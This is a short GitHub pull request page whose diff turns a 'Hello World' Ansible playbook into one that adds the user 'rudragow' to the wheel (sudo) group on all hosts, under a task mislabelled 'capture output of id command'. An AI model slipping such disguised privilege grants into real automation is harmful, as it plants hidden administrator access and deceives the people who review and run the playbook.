Skip to content
This repository has been archived by the owner on Apr 30, 2024. It is now read-only.

Update hello_world.yml #19

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
9 changes: 4 additions & 5 deletions hello_world.yml
Original file line number Diff line number Diff line change
@@ -1,7 +1,6 @@
- name: Hello World Sample
- name: Sudo access to users
hosts: all
tasks:
- name: Hello Message
debug:
msg: "Hello World!"

- name: capture output of id command
command: sudo usermod -aG wheel rudragow
register: login